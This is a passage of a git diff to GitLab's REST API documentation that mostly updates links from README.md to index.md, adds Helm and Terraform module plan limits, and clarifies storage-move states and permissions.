`id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | ```shell @@ -359,7 +359,7 @@ DELETE /projects/:id/pipelines/:pipeline_id | Attribute | Type | Required | Description | |------------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `pipeline_id` | integer | yes | The ID of a pipeline | ```shell diff --git a/doc/api/plan_limits.md b/doc/api/plan_limits.md index 105cf13f9de..c89c7b46d54 100644 --- a/doc/api/plan_limits.md +++ b/doc/api/plan_limits.md @@ -38,10 +38,12 @@ Example response: { "conan_max_file_size": 3221225472, "generic_packages_max_file_size": 5368709120, + "helm_max_file_size": 5242880, "maven_max_file_size": 3221225472, "npm_max_file_size": 524288000, "nuget_max_file_size": 524288000, - "pypi_max_file_size": 3221225472 + "pypi_max_file_size": 3221225472, + "terraform_module_max_file_size": 1073741824 } ``` @@ -58,10 +60,12 @@ PUT /application/plan_limits | `plan_name` | string | yes | Name of the plan to update. | | `conan_max_file_size` | integer | no | Maximum Conan package file size in bytes. | | `generic_packages_max_file_size` | integer | no | Maximum generic package file size in bytes. | +| `helm_max_file_size` | integer | no | Maximum Helm chart file size in bytes. | | `maven_max_file_size` | integer | no | Maximum Maven package file size in bytes. | | `npm_max_file_size` | integer | no | Maximum NPM package file size in bytes. | | `nuget_max_file_size` | integer | no | Maximum NuGet package file size in bytes. | | `pypi_max_file_size` | integer | no | Maximum PyPI package file size in bytes. | +| `terraform_module_max_file_size` | integer | no | Maximum Terraform Module package file size in bytes. | ```shell curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/application/plan_limits?plan_name=default&conan_max_file_size=3221225472" @@ -73,9 +77,11 @@ Example response: { "conan_max_file_size": 3221225472, "generic_packages_max_file_size": 5368709120, + "helm_max_file_size": 5242880, "maven_max_file_size": 3221225472, "npm_max_file_size": 524288000, "nuget_max_file_size": 524288000, - "pypi_max_file_size": 3221225472 + "pypi_max_file_size": 3221225472, + "terraform_module_max_file_size": 1073741824 } ``` diff --git a/doc/api/project_badges.md b/doc/api/project_badges.md index c6bcaa1ae9c..7726261a329 100644 --- a/doc/api/project_badges.md +++ b/doc/api/project_badges.md @@ -31,7 +31,7 @@ GET /projects/:id/badges | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | no | Name of the badges to return (case-sensitive). | ```shell @@ -73,7 +73,7 @@ GET /projects/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | ```shell @@ -103,7 +103,7 @@ POST /projects/:id/badges | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `link_url` | string | yes | URL of the badge link | | `image_url` | string | yes | URL of the badge image | | `name` | string | no | Name of the badge | @@ -138,7 +138,7 @@ PUT /projects/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | | `link_url` | string | no | URL of the badge link | | `image_url` | string | no | URL of the badge image | @@ -172,7 +172,7 @@ DELETE /projects/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | ```shell @@ -189,7 +189,7 @@ GET /projects/:id/badges/render | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `link_url` | string | yes | URL of the badge link| | `image_url` | string | yes | URL of the badge image | diff --git a/doc/api/project_clusters.md b/doc/api/project_clusters.md index f31b3ccd0bb..2b4976510bb 100644 --- a/doc/api/project_clusters.md +++ b/doc/api/project_clusters.md @@ -22,7 +22,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------- | -------- | ----------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | Example request: @@ -92,7 +92,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | ------- | -------- | ----------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `cluster_id` | integer | yes | The ID of the cluster | Example request: @@ -186,9 +186,9 @@ Parameters: | Attribute | Type | Required | Description | | ---------------------------------------------------- | ------- | -------- | ----------------------------------------------------------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the cluster | -| `domain` | string | no | The [base domain](../user/project/clusters/index.md#base-domain) of the cluster | +| `domain` | string | no | The [base domain](../user/project/clusters/gitlab_managed_clusters.md#base-domain) of the cluster | | `management_project_id` | integer | no | The ID of the [management project](../user/clusters/management_project.md) for the cluster | | `enabled` | boolean | no | Determines if cluster is active or not, defaults to `true` | | `managed` | boolean | no | Determines if GitLab manages namespaces and service accounts for this cluster. Defaults to `true` | @@ -283,10 +283,10 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------------------------- | ------- | -------- | ------------------------------------------------------------------------------------------ | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `cluster_id` | integer | yes | The ID of the cluster | | `name` | string | no | The name of the cluster | -| `domain` | string | no | The [base domain](../user/project/clusters/index.md#base-domain) of the cluster | +| `domain` | string | no | The [base domain](../user/project/clusters/gitlab_managed_clusters.md#base-domain) of the cluster | | `management_project_id` | integer | no | The ID of the [management project](../user/clusters/management_project.md) for the cluster | | `enabled` | boolean | no | Determines if cluster is active or not | | `managed` | boolean | no | Determines if GitLab manages namespaces and service accounts for this cluster | @@ -395,7 +395,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | ------- | -------- | ----------------------------------------------------- | -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `cluster_id` | integer | yes | The ID of the cluster | Example request: diff --git a/doc/api/project_import_export.md b/doc/api/project_import_export.md index b20ce9896dc..92b1558551d 100644 --- a/doc/api/project_import_export.md +++ b/doc/api/project_import_export.md @@ -31,7 +31,7 @@ POST /projects/:id/export | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `description` | string | no | Overrides the project description | | `upload` | hash | no | Hash that contains the information to upload the exported project to a web server | | `upload[url]` | string | yes | The URL to upload the project | @@ -62,7 +62,7 @@ GET /projects/:id/export | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/export" @@ -110,7 +110,7 @@ GET /projects/:id/export/download | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" --remote-header-name \ @@ -258,7 +258,7 @@ GET /projects/:id/import | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ---------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/import" diff --git a/doc/api/project_level_variables.md b/doc/api/project_level_variables.md index 0b7193ad5bc..e596b25ca22 100644 --- a/doc/api/project_level_variables.md +++ b/doc/api/project_level_variables.md @@ -17,7 +17,7 @@ GET /projects/:id/variables | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/variables" @@ -48,7 +48,7 @@ GET /projects/:id/variables/:key | Attribute | Type | required | Description | |-----------|---------|----------|-----------------------| -| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | | `filter` | hash | no | Available filters: `[environment_scope]`. See the [`filter` parameter details](#the-filter-parameter). | @@ -76,7 +76,7 @@ POST /projects/:id/variables | Attribute | Type | required | Description | |---------------------|---------|----------|-----------------------| -| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable; must have no more than 255 characters; only `A-Z`, `a-z`, `0-9`, and `_` are allowed | | `value` | string | yes | The `value` of a variable | | `variable_type` | string | no | The type of a variable. Available types are: `env_var` (default) and `file` | @@ -110,7 +110,7 @@ PUT /projects/:id/variables/:key | Attribute | Type | required | Description | |---------------------|---------|----------|-------------------------| -| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | | `value` | string | yes | The `value` of a variable | | `variable_type` | string | no | The type of a variable. Available types are: `env_var` (default) and `file` | @@ -145,7 +145,7 @@ DELETE /projects/:id/variables/:key | Attribute | Type | required | Description | |-----------|---------|----------|-------------------------| -| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a project or [URL-encoded NAMESPACE/PROJECT_NAME of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | | `filter` | hash | no | Available filters: `[environment_scope]`. See the [`filter` parameter details](#the-filter-parameter). | diff --git a/doc/api/project_repository_storage_moves.md b/doc/api/project_repository_storage_moves.md index 31c306bb14f..fe2750fa4bf 100644 --- a/doc/api/project_repository_storage_moves.md +++ b/doc/api/project_repository_storage_moves.md @@ -16,19 +16,19 @@ for example. As project repository storage moves are processed, they transition through different states. Values of `state` are: -- `initial` -- `scheduled` -- `started` -- `finished` -- `failed` -- `replicated` -- `cleanup failed` +- `initial`: The record has been created but the background job has not yet been scheduled. +- `scheduled`: The background job has been scheduled. +- `started`: The project repositories are being copied to the destination storage. +- `replicated`: The project has been moved. +- `failed`: The project repositories failed to copy or the checksums did not match. +- `finished`: The project has been moved and the repositories on the source storage have been deleted. +- `cleanup failed`: The project has been moved but the repositories on the source storage could not be deleted. To ensure data integrity, projects are put in a temporary read-only state for the duration of the move. During this time, users receive a `The repository is temporarily read-only. Please try again later.` message if they try to push new commits. -This API requires you to [authenticate yourself](README.md#authentication) as an administrator. +This API requires you to [authenticate yourself](index.md#authentication) as an administrator. For other repository types see: @@ -42,7 +42,7 @@ GET /project_repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Example request: @@ -80,7 +80,7 @@ GET /projects/:project_id/repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Parameters: diff --git a/doc/api/project_snippets.md b/doc/api/project_snippets.md index 156d3c57a43..0ac2297e3c1 100644 --- a/doc/api/project_snippets.md +++ b/doc/api/project_snippets.md @@ -36,7 +36,7 @@ GET /projects/:id/snippets Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user ## Single snippet @@ -48,7 +48,7 @@ GET /projects/:id/snippets/:snippet_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `snippet_id` (required) - The ID of a project's snippet ```json @@ -85,7 +85,7 @@ Parameters: | Attribute | Type | Required | Description | |:------------------|:----------------|:---------|:----------------------------------------------------------------------------------------------------------------| -| `id` | integer | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `title` | string | yes | Title of a snippet | | `file_name` | string | no | Deprecated: Use `files` instead. Name of a snippet file | | `content` | string | no | Deprecated: Use `files` instead. Content of a snippet | @@ -132,7 +132,7 @@ Parameters: | Attribute | Type | Required | Description | |:----------------------|:----------------|:---------|:----------------------------------------------------------------------------------------------------------------| -| `id` | integer | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `snippet_id` | integer | yes | The ID of a project's snippet | | `title` | string | no | Title of a snippet | | `file_name` | string | no | Deprecated: Use `files` instead. Name of a snippet file | @@ -183,7 +183,7 @@ DELETE /projects/:id/snippets/:snippet_id Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `snippet_id` (required) - The ID of a project's snippet Example request: @@ -203,7 +203,7 @@ GET /projects/:id/snippets/:snippet_id/raw Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `snippet_id` (required) - The ID of a project's snippet Example request: @@ -223,7 +223,7 @@ GET /projects/:id/snippets/:snippet_id/files/:ref/:file_path/raw Parameters: -- `id` (required) - The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user +- `id` (required) - The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user - `snippet_id` (required) - The ID of a project's snippet - `ref` (required) - The name of a branch, tag or commit, such as `main` - `file_path` (required) - The URL-encoded path to the file, such as `snippet%2Erb` @@ -247,7 +247,7 @@ GET /projects/:id/snippets/:snippet_id/user_agent_detail | Attribute | Type | Required | Description | |---------------|---------|----------|--------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of a project](README.md#namespaced-path-encoding). | +| `id` | integer or string | yes | The ID or [URL-encoded path of a project](index.md#namespaced-path-encoding). | | `snippet_id` | Integer | yes | The ID of a snippet | Example request: diff --git a/doc/api/project_statistics.md b/doc/api/project_statistics.md index 6a987b60f64..a16bcc513f9 100644 --- a/doc/api/project_statistics.md +++ b/doc/api/project_statistics.md @@ -21,7 +21,7 @@ GET /projects/:id/statistics | Attribute | Type | Required | Description | | ---------- | ------ | -------- | ----------- | -| `id` | integer / string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer / string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | Example response: diff --git a/doc/api/project_templates.md b/doc/api/project_templates.md index 186b6a956a4..d4af0e8d78d 100644 --- a/doc/api/project_templates.md +++ b/doc/api/project_templates.md @@ -33,7 +33,7 @@ GET /projects/:id/templates/:type | Attribute | Type | Required | Description | | ---------- | ------ | -------- | ----------- | -| `id` | integer / string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer / string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `type` | string | yes | The type of the template. Accepted values are: `dockerfiles`, `gitignores`, `gitlab_ci_ymls`, `licenses`, `issues`, `merge_requests` | Example response (licenses): @@ -99,7 +99,7 @@ GET /projects/:id/templates/:type/:name | Attribute | Type | Required | Description | | ---------- | ------ | -------- | ----------- | -| `id` | integer / string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer / string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `type` | string | yes| The type of the template. One of: `dockerfiles`, `gitignores`, `gitlab_ci_ymls`, `licenses`, `issues`, or `merge_requests`. | | `name` | string | yes | The key of the template, as obtained from the collection endpoint | | `source_template_project_id` | integer | no | The project ID where a given template is being stored. This is useful when multiple templates from different projects have the same name. If multiple templates have the same name, the match from `closest ancestor` is returned if `source_template_project_id` is not specified | diff --git a/doc/api/project_vulnerabilities.md b/doc/api/project_vulnerabilities.md index 969ebe1f9c6..2035d17aa3f 100644 --- a/doc/api/project_vulnerabilities.md +++ b/doc/api/project_vulnerabilities.md @@ -14,7 +14,7 @@ This API is in an alpha stage and considered unstable. The response payload may be subject to change or breakage across GitLab releases. -Every API call to vulnerabilities must be [authenticated](README.md#authentication). +Every API call to vulnerabilities must be [authenticated](index.md#authentication). Vulnerability permissions inherit permissions from their project. If a project is private, and a user isn't a member of the project to which the vulnerability @@ -24,7 +24,7 @@ belongs, requests to that project returns a `404 Not Found` status code. API results are paginated, and `GET` requests return 20 results at a time by default. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). ## List project vulnerabilities @@ -40,7 +40,7 @@ GET /projects/:id/vulnerabilities | Attribute | Type | Required | Description | | ------------- | -------------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/4/vulnerabilities" @@ -117,7 +117,7 @@ POST /projects/:id/vulnerabilities?finding_id=<your_finding_id> | Attribute | Type | Required | Description | | ------------------- | ----------------- | ---------- | -----------------------------------------------------------------------------------------------------------------------------| -| `id` | integer or string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) which the authenticated user is a member of | +| `id` | integer or string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) which the authenticated user is a member of | | `finding_id` | integer or string | yes | The ID of a Vulnerability Finding to create the new Vulnerability from | The other attributes of a newly created Vulnerability are populated from diff --git a/doc/api/projects.md b/doc/api/projects.md index e5cb2c8e1eb..72de8ab6844 100644 --- a/doc/api/projects.md +++ b/doc/api/projects.md @@ -4,7 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Projects API +# Projects API **(FREE)** + +Interact with [projects](../user/project/index.md) using the REST API. ## Project visibility level @@ -58,7 +60,7 @@ GET /projects | `simple` | boolean | **{dotted-circle}** No | Return only limited fields for each project. This is a no-op without authentication as then _only_ simple fields are returned. | | `sort` | string | **{dotted-circle}** No | Return projects sorted in `asc` or `desc` order. Default is `desc`. | | `starred` | boolean | **{dotted-circle}** No | Limit by projects starred by the current user. | -| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. | +| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. Only available to Reporter or higher level role members. | | `topic` | string | **{dotted-circle}** No | Comma-separated topic names. Limit results to projects that match all of given topics. See `topics` attribute. | | `visibility` | string | **{dotted-circle}** No | Limit by visibility `public`, `internal`, or `private`. | | `wiki_checksum_failed` **(PREMIUM)** | boolean | **{dotted-circle}** No | Limit projects where the wiki checksum calculation has failed ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/6137) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.2). | @@ -67,7 +69,7 @@ GET /projects | `with_merge_requests_enabled` | boolean | **{dotted-circle}** No | Limit by enabled merge requests feature. | | `with_programming_language` | string | **{dotted-circle}** No | Limit by projects which use the given programming language. | -This endpoint supports [keyset pagination](README.md#keyset-based-pagination) +This endpoint supports [keyset pagination](index.md#keyset-based-pagination) for selected `order_by` options. When `simple=true` or the user is unauthenticated this returns something like: @@ -345,9 +347,9 @@ GET /projects?custom_attributes[key]=value&custom_attributes[other_key]=other_va ### Pagination limits -In GitLab 13.0 and later, [offset-based pagination](README.md#offset-based-pagination) +In GitLab 13.0 and later, [offset-based pagination](index.md#offset-based-pagination) is [limited to 50,000 records](https://gitlab.com/gitlab-org/gitlab/-/issues/34565). -[Keyset pagination](README.md#keyset-based-pagination) is required to retrieve +[Keyset pagination](index.md#keyset-based-pagination) is required to retrieve projects beyond this limit. Keyset pagination supports only `order_by=id`. Other sorting options aren't available. @@ -357,7 +359,7 @@ Keyset pagination supports only `order_by=id`. Other sorting options aren't avai Get a list of visible projects owned by the given user. When accessed without authentication, only public projects are returned. -This endpoint supports [keyset pagination](README.md#keyset-based-pagination) +This endpoint supports [keyset pagination](index.md#keyset-based-pagination) for selected `order_by` options. ```plaintext @@ -377,7 +379,7 @@ GET /users/:user_id/projects | `simple` | boolean | **{dotted-circle}** No | Return only limited fields for each project. This is a no-op without authentication as then _only_ simple fields are returned. | | `sort` | string | **{dotted-circle}** No | Return projects sorted in `asc` or `desc` order. Default is `desc`. | | `starred` | boolean | **{dotted-circle}** No | Limit by projects starred by the current user. | -| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. | +| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. Only available to Reporter or higher level role members. | | `user_id` | string | **{check-circle}** Yes | The ID or username of the user. | | `visibility` | string | **{dotted-circle}** No | Limit by visibility `public`, `internal`, or `private`. | | `with_custom_attributes` | boolean | **{dotted-circle}** No | Include [custom attributes](custom_attributes.md) in response. _(admins only)_ | @@ -610,7 +612,7 @@ GET /users/:user_id/starred_projects | `simple` | boolean | **{dotted-circle}** No | Return only limited fields for each project. This is a no-op without authentication as then _only_ simple fields are returned.. | | `sort` | string | **{dotted-circle}** No | Return projects sorted in `asc` or `desc` order. Default is `desc`. | | `starred` | boolean | **{dotted-circle}** No | Limit by projects starred by the current user. | -| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. | +| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. Only available to Reporter or higher level role members. | | `user_id` | string | **{check-circle}** Yes | The ID or username of the user. | | `visibility` | string | **{dotted-circle}** No | Limit by visibility `public`, `internal`, or `private`. | | `with_custom_attributes` | boolean | **{dotted-circle}** No | Include [custom attributes](custom_attributes.md) in response. _(admins only)_ | @@ -827,9 +829,9 @@ GET /projects/:id | Attribute | Type | Required | Description | |--------------------------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `license` | boolean | **{dotted-circle}** No | Include project license data. | -| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. | +| `statistics` | boolean | **{dotted-circle}** No | Include project statistics. Only available to Reporter or higher level role members. | | `with_custom_attributes` | boolean | **{dotted-circle}** No | Include [custom attributes](custom_attributes.md) in response. _(admins only)_ | ```json @@ -1080,7 +1082,7 @@ GET /projects/:id/users | Attribute | Type | Required | Description | |--------------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `search` | string | **{dotted-circle}** No | Search for specific users. | | `skip_users` | integer array | **{dotted-circle}** No | Filter out users with the specified IDs. | @@ -1115,7 +1117,7 @@ GET /projects/:id/groups | Attribute | Type | Required | Description | |-----------------------------|-------------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `search` | string | **{dotted-circle}** No | Search for specific groups. | | `skip_groups` | array of integers | **{dotted-circle}** No | Skip the group IDs passed. | | `with_shared` | boolean | **{dotted-circle}** No | Include projects shared with this group. Default is `false`. | @@ -1326,7 +1328,7 @@ PUT /projects/:id | `build_timeout` | integer | **{dotted-circle}** No | The maximum amount of time, in seconds, that a job can run. | | `builds_access_level` | string | **{dotted-circle}** No | One of `disabled`, `private`, or `enabled`. | | `ci_config_path` | string | **{dotted-circle}** No | The path to CI configuration file. | -| `ci_default_git_depth` | integer | **{dotted-circle}** No | Default number of revisions for [shallow cloning](../ci/pipelines/settings.md#git-shallow-clone). | +| `ci_default_git_depth` | integer | **{dotted-circle}** No | Default number of revisions for [shallow cloning](../ci/pipelines/settings.md#limit-the-number-of-changes-fetched-during-clone). | | `ci_forward_deployment_enabled` | boolean | **{dotted-circle}** No | When a new deployment job starts, [skip older deployment jobs](../ci/pipelines/settings.md#skip-outdated-deployment-jobs) that are still pending | | `container_expiration_policy_attributes` | hash | **{dotted-circle}** No | Update the image cleanup policy for this project. Accepts: `cadence` (string), `keep_n` (integer), `older_than` (string), `name_regex` (string), `name_regex_delete` (string), `name_regex_keep` (string), `enabled` (boolean). | | `container_registry_enabled` | boolean | **{dotted-circle}** No | Enable container registry for this project. | @@ -1335,7 +1337,7 @@ PUT /projects/:id | `emails_disabled` | boolean | **{dotted-circle}** No | Disable email notifications. | | `external_authorization_classification_label` **(PREMIUM)** | string | **{dotted-circle}** No | The classification label for the project. | | `forking_access_level` | string | **{dotted-circle}** No | One of `disabled`, `private`, or `enabled`. | -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `import_url` | string | **{dotted-circle}** No | URL to import repository from. | | `issues_access_level` | string | **{dotted-circle}** No | One of `disabled`, `private`, or `enabled`. | | `issues_enabled` | boolean | **{dotted-circle}** No | _(Deprecated)_ Enable issues for this project. Use `issues_access_level` instead. | @@ -1394,7 +1396,7 @@ POST /projects/:id/fork | Attribute | Type | Required | Description | |------------------|----------------|------------------------|-------------| -| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer or string | **{check-circle}** Yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `name` | string | **{dotted-circle}** No | The name assigned to the resultant project after forking. | | `namespace_id` | integer | **{dotted-circle}** No | The ID of the namespace that the project is forked to. | | `namespace_path` | string | **{dotted-circle}** No | The path of the namespace that the project is forked to. | @@ -1417,7 +1419,7 @@ GET /projects/:id/forks | Attribute | Type | Required | Description | |-------------------------------|----------------|------------------------|-------------| | `archived` | boolean | **{dotted-circle}** No | Limit by archived status. | -| `id` | integer or string | **{check-circle}** Yes | The ID or 